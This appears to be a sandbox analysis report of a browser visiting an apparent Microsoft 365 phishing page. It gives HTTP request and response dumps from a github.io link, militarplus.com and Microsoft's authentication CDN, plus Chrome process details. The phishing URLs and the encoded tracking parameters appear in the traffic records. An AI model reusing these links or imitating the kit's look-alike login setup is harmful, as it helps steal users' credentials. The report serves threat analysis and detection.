                                                        Date: Sun, 12 Jan 2025 00:25:09 GMT
                                                        Etag: "0f1ffcf6763db1:0+ident"
                                                        Last-Modified: Fri, 10 Jan 2025 13:59:06 GMT
                                                        Server: ECS (lhd/35B3)
                                                        Vary: Accept-Encoding
                                                        X-Cache: HIT
                                                        X-Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                                        X-Powered-By: ASP.NET
                                                        Content-Length: 23427
                                                        Connection: close
                                                        2025-01-12 00:25:09 UTC16383INData Raw: ef bb bf 2f 2a 20 57 33 2e 43 53 53 20 34 2e 31 35 20 44 65 63 65 6d 62 65 72 20 32 30 32 30 20 62 79 20 4a 61 6e 20 45 67 69 6c 20 61 6e 64 20 42 6f 72 67 65 20 52 65 66 73 6e 65 73 20 2a 2f 0a 68 74 6d 6c 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 0a 2f 2a 20 45 78 74 72 61 63 74 20 66 72 6f 6d 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 62 79 20 4e 69 63 6f 6c 61 73 20 47 61 6c 6c 61 67 68 65 72 20 61 6e 64 20 4a 6f 6e 61 74 68 61 6e 20 4e 65 61 6c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 0a 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62
                                                        Data Ascii: /* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}/* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */html{-ms-text-size-adjust:100%;-web
                                                        2025-01-12 00:25:09 UTC7044INData Raw: 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 62 63 64 34 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 62 6c 75 65 2d 67 72 65 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 65 79 3a 68 6f 76 65 72 2c 2e 77 33 2d 62 6c 75 65 2d 67 72 61 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 61 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 30 37 64 38 62 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 67 72 65 65 6e 2c 2e 77 33 2d 68 6f 76 65 72 2d 67 72 65 65 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23
                                                        Data Ascii: !important;background-color:#00bcd4!important}.w3-blue-grey,.w3-hover-blue-grey:hover,.w3-blue-gray,.w3-hover-blue-gray:hover{color:#fff!important;background-color:#607d8b!important}.w3-green,.w3-hover-green:hover{color:#fff!important;background-color:#


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.649823152.199.21.1754431444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-12 00:25:09 UTC659OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                                        Host: aadcdn.msftauth.net
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://militarplus.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-01-12 00:25:09 UTC738INHTTP/1.1 200 OK
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Age: 25296681
                                                        Cache-Control: public, max-age=31536000
                                                        Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                                        Content-Type: image/svg+xml
                                                        Date: Sun, 12 Jan 2025 00:25:09 GMT
                                                        Etag: 0x8DB5C3F4AC59B47
                                                        Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                                        Server: ECAcc (lhc/78BB)
                                                        Vary: Accept-Encoding
                                                        X-Cache: HIT
                                                        x-ms-blob-type: BlockBlob
                                                        x-ms-lease-status: unlocked
                                                        x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                                        x-ms-version: 2009-09-19
                                                        Content-Length: 1636
                                                        Connection: close
                                                        2025-01-12 00:25:09 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                                        Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.64983972.167.84.164431444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-12 00:25:10 UTC742OUTGET /wp-content/uploads/2023/01/cropped-AF-Logo-Militar-Plus-04-1-32x32.webp HTTP/1.1
                                                        Host: militarplus.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.co
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-01-12 00:25:10 UTC292INHTTP/1.1 200 OK
                                                        Date: Sun, 12 Jan 2025 00:25:10 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Last-Modified: Thu, 05 Jan 2023 22:06:11 GMT
                                                        ETag: "3c3046-55c0-5f18b8237dac0"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 21952
                                                        Vary: Accept-Encoding
                                                        Content-Type: image/webp
                                                        2025-01-12 00:25:10 UTC7900INData Raw: 52 49 46 46 b8 55 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 04 00 00 00 1f 00 00 1f 00 00 56 50 38 20 e0 01 00 00 d0 08 00 9d 01 2a 20 00 20 00 3e 3d 18 89 43 a2 21 a1 1b f4 00 20 03 c4 b1 80 83 00 fe 3b f9 01 8b f0 4d 6c 8b e5 01 47 6b 1d 7f ed df 8d 79 f4 1e 67 bf d5 7a 3c e8 43 35 8f f2 8c 00 b4 12 f9 28 71 1d f7 c6 da bb 80 8e 9e a9 43 eb c2 60 00 fe ff 14 98 ff ed ff fe 60 b5 ff 26 de 76 7a a0 87 04 6a e5 4b e4 d5 82 01 38 00 4e 9f ff df 57 fb 0b cd fe 4e ff 9d ff f1 30 1f ab 9e 0f 2e fd d4 ff fc dc 7d 5d 99 ff 18 bf d5 38 fd dd 1c f7 cb ac a1 b4 48 86 fd 62 45 7a 0b 81 67 77 36 5e db 3e 90 cf 45 22 f7 8f be ce ee 50 8c 5c c4 c0 65 a0 82 fc 37 3b 7e b1 b1 1c 7d ba 31 60 ba 91 71 13 b6 cd 7e cd fb 32 bc 53 ec f8 aa 25 7b 55 fa af 15 8d 40 17 fc 36 4f
                                                        Data Ascii: RIFFUWEBPVP8XVP8 * >=C! ;MlGkygz<C5(qC``&vzjK8NWN0.}]8HbEzgw6^>E"P\e7;~}1`q~2S%{U@6O
                                                        2025-01-12 00:25:10 UTC8000INData Raw: 2f 36 46 75 2f 4e 26 23 78 41 3b 50 2f 6c 69 74 2f 38 41 70 4a 69 2f 72 6a 34 5a 58 67 4c 76 2b 68 62 76 7a 54 2f 35 59 72 66 2f 41 4b 53 59 76 36 34 2b 47 56 34 43 37 2f 6f 57 37 38 30 2f 2b 57 4b 33 2f 77 43 6b 6d 4c 2b 75 50 68 6c 65 41 75 2f 36 46 75 2f 4e 26 23 78 41 3b 50 2f 6c 69 74 2f 38 41 70 4a 69 2f 72 6a 34 5a 58 67 4c 33 76 38 6a 66 4a 6d 75 2b 55 50 4a 73 32 6c 36 33 47 6b 56 34 39 37 4c 63 4b 73 62 72 49 4f 44 78 78 71 44 56 64 75 71 48 4c 73 63 53 41 7a 69 4b 44 30 50 4a 73 6e 59 71 26 23 78 41 3b 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 26 23 78 41 3b 46
                                                        Data Ascii: /6Fu/N&#xA;P/lit/8ApJi/rj4ZXgLv+hbvzT/5Yrf/AKSYv64+GV4C7/oW780/+WK3/wCkmL+uPhleAu/6Fu/N&#xA;P/lit/8ApJi/rj4ZXgL3v8jfJmu+UPJs2l63GkV497LcKsbrIODxxqDVduqHLscSAziKD0PJsnYq&#xA;7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7&#xA;F
                                                        2025-01-12 00:25:10 UTC6052INData Raw: 31 75 76 4f 67 69 54 52 64 4f 31 52 70 39 59 6b 74 72 2b 30 6b 30 6d 4b 52 26 23 78 41 3b 6c 74 53 31 5a 4c 74 37 76 68 54 6b 70 4f 34 59 31 50 58 4b 4d 4f 51 79 6b 62 2f 6e 45 63 6d 55 34 67 55 79 72 38 6b 34 68 46 2b 57 6d 6b 78 67 55 43 76 65 41 41 62 41 44 36 37 4e 6d 58 6a 35 4e 59 5a 78 6b 30 75 78 56 32 4b 75 26 23 78 41 3b 78 56 32 4b 76 44 37 50 38 76 74 48 38 35 65 64 45 31 33 53 37 37 56 31 30 65 7a 6e 31 4f 78 31 61 53 53 2f 6d 6a 6e 6a 76 46 6b 53 69 32 31 48 4a 57 45 6d 75 79 30 48 54 62 43 71 66 66 6d 39 39 51 67 6d 38 72 61 58 64 70 62 50 26 23 78 41 3b 5a 54 47 36 6a 61 36 76 74 4e 58 57 5a 49 2f 51 67 56 6b 4b 78 4d 72 76 56 79 6f 44 45 66 54 6b 4a 46 55 69 2f 4c 36 78 6a 68 2f 4d 48 79 72 64 76 6f 64 70 6f 4f 6f 58 76 6c 36 2b 6b 76 72
                                                        Data Ascii: 1uvOgiTRdO1Rp9Yktr+0k0mKR&#xA;ltS1ZLt7vhTkpO4Y1PXKMOQykb/nEcmU4gUyr8k4hF+WmkxgUCveAAbAD67NmXj5NYZxk0uxV2Ku&#xA;xV2KvD7P8vtH85edE13S77V10ezn1Ox1aSS/mjnjvFkSi21HJWEmuy0HTbCqffm99Qgm8raXdpbP&#xA;ZTG6ja6vtNXWZI/QgVkKxMrvVyoDEfTkJFUi/L6xjh/MHyrdvodpoOoXvl6+kvr


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.649837152.199.21.1754431444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-12 00:25:10 UTC424OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                                        Host: aadcdn.msftauth.net
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-01-12 00:25:10 UTC738INHTTP/1.1 200 OK
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Age: 25296682
                                                        Cache-Control: public, max-age=31536000
                                                        Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                                        Content-Type: image/svg+xml
                                                        Date: Sun, 12 Jan 2025 00:25:10 GMT
                                                        Etag: 0x8DB5C3F4AC59B47
                                                        Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                                        Server: ECAcc (lhc/78BB)
                                                        Vary: Accept-Encoding
                                                        X-Cache: HIT
                                                        x-ms-blob-type: BlockBlob
                                                        x-ms-lease-status: unlocked
                                                        x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                                        x-ms-version: 2009-09-19
                                                        Content-Length: 1636
                                                        Connection: close
                                                        2025-01-12 00:25:10 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                                        Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.64984372.167.84.164431444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-12 00:25:11 UTC410OUTGET /wp-content/uploads/2023/01/cropped-AF-Logo-Militar-Plus-04-1-32x32.webp HTTP/1.1
                                                        Host: militarplus.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-01-12 00:25:11 UTC292INHTTP/1.1 200 OK
                                                        Date: Sun, 12 Jan 2025 00:25:11 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Last-Modified: Thu, 05 Jan 2023 22:06:11 GMT
                                                        ETag: "3c3046-55c0-5f18b8237dac0"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 21952
                                                        Vary: Accept-Encoding
                                                        Content-Type: image/webp
                                                        2025-01-12 00:25:11 UTC7900INData Raw: 52 49 46 46 b8 55 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 04 00 00 00 1f 00 00 1f 00 00 56 50 38 20 e0 01 00 00 d0 08 00 9d 01 2a 20 00 20 00 3e 3d 18 89 43 a2 21 a1 1b f4 00 20 03 c4 b1 80 83 00 fe 3b f9 01 8b f0 4d 6c 8b e5 01 47 6b 1d 7f ed df 8d 79 f4 1e 67 bf d5 7a 3c e8 43 35 8f f2 8c 00 b4 12 f9 28 71 1d f7 c6 da bb 80 8e 9e a9 43 eb c2 60 00 fe ff 14 98 ff ed ff fe 60 b5 ff 26 de 76 7a a0 87 04 6a e5 4b e4 d5 82 01 38 00 4e 9f ff df 57 fb 0b cd fe 4e ff 9d ff f1 30 1f ab 9e 0f 2e fd d4 ff fc dc 7d 5d 99 ff 18 bf d5 38 fd dd 1c f7 cb ac a1 b4 48 86 fd 62 45 7a 0b 81 67 77 36 5e db 3e 90 cf 45 22 f7 8f be ce ee 50 8c 5c c4 c0 65 a0 82 fc 37 3b 7e b1 b1 1c 7d ba 31 60 ba 91 71 13 b6 cd 7e cd fb 32 bc 53 ec f8 aa 25 7b 55 fa af 15 8d 40 17 fc 36 4f
                                                        Data Ascii: RIFFUWEBPVP8XVP8 * >=C! ;MlGkygz<C5(qC``&vzjK8NWN0.}]8HbEzgw6^>E"P\e7;~}1`q~2S%{U@6O
                                                        2025-01-12 00:25:11 UTC8000INData Raw: 2f 36 46 75 2f 4e 26 23 78 41 3b 50 2f 6c 69 74 2f 38 41 70 4a 69 2f 72 6a 34 5a 58 67 4c 76 2b 68 62 76 7a 54 2f 35 59 72 66 2f 41 4b 53 59 76 36 34 2b 47 56 34 43 37 2f 6f 57 37 38 30 2f 2b 57 4b 33 2f 77 43 6b 6d 4c 2b 75 50 68 6c 65 41 75 2f 36 46 75 2f 4e 26 23 78 41 3b 50 2f 6c 69 74 2f 38 41 70 4a 69 2f 72 6a 34 5a 58 67 4c 33 76 38 6a 66 4a 6d 75 2b 55 50 4a 73 32 6c 36 33 47 6b 56 34 39 37 4c 63 4b 73 62 72 49 4f 44 78 78 71 44 56 64 75 71 48 4c 73 63 53 41 7a 69 4b 44 30 50 4a 73 6e 59 71 26 23 78 41 3b 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 46 58 59 71 37 26 23 78 41 3b 46
                                                        Data Ascii: /6Fu/N&#xA;P/lit/8ApJi/rj4ZXgLv+hbvzT/5Yrf/AKSYv64+GV4C7/oW780/+WK3/wCkmL+uPhleAu/6Fu/N&#xA;P/lit/8ApJi/rj4ZXgL3v8jfJmu+UPJs2l63GkV497LcKsbrIODxxqDVduqHLscSAziKD0PJsnYq&#xA;7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7&#xA;F
                                                        2025-01-12 00:25:11 UTC6052INData Raw: 31 75 76 4f 67 69 54 52 64 4f 31 52 70 39 59 6b 74 72 2b 30 6b 30 6d 4b 52 26 23 78 41 3b 6c 74 53 31 5a 4c 74 37 76 68 54 6b 70 4f 34 59 31 50 58 4b 4d 4f 51 79 6b 62 2f 6e 45 63 6d 55 34 67 55 79 72 38 6b 34 68 46 2b 57 6d 6b 78 67 55 43 76 65 41 41 62 41 44 36 37 4e 6d 58 6a 35 4e 59 5a 78 6b 30 75 78 56 32 4b 75 26 23 78 41 3b 78 56 32 4b 76 44 37 50 38 76 74 48 38 35 65 64 45 31 33 53 37 37 56 31 30 65 7a 6e 31 4f 78 31 61 53 53 2f 6d 6a 6e 6a 76 46 6b 53 69 32 31 48 4a 57 45 6d 75 79 30 48 54 62 43 71 66 66 6d 39 39 51 67 6d 38 72 61 58 64 70 62 50 26 23 78 41 3b 5a 54 47 36 6a 61 36 76 74 4e 58 57 5a 49 2f 51 67 56 6b 4b 78 4d 72 76 56 79 6f 44 45 66 54 6b 4a 46 55 69 2f 4c 36 78 6a 68 2f 4d 48 79 72 64 76 6f 64 70 6f 4f 6f 58 76 6c 36 2b 6b 76 72
                                                        Data Ascii: 1uvOgiTRdO1Rp9Yktr+0k0mKR&#xA;ltS1ZLt7vhTkpO4Y1PXKMOQykb/nEcmU4gUyr8k4hF+WmkxgUCveAAbAD67NmXj5NYZxk0uxV2Ku&#xA;xV2KvD7P8vtH85edE13S77V10ezn1Ox1aSS/mjnjvFkSi21HJWEmuy0HTbCqffm99Qgm8raXdpbP&#xA;ZTG6ja6vtNXWZI/QgVkKxMrvVyoDEfTkJFUi/L6xjh/MHyrdvodpoOoXvl6+kvr


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to jump to process

                                                        Target ID:1
                                                        Start time:19:24:39
                                                        Start date:11/01/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                        Imagebase:0x7ff684c40000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:3
                                                        Start time:19:24:40
                                                        Start date:11/01/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1964,i,1605369592726491557,6296709681448517168,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                        Imagebase:0x7ff684c40000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:4
                                                        Start time:19:24:48
                                                        Start date:11/01/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/"
                                                        Imagebase:0x7ff684c40000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        No disassembly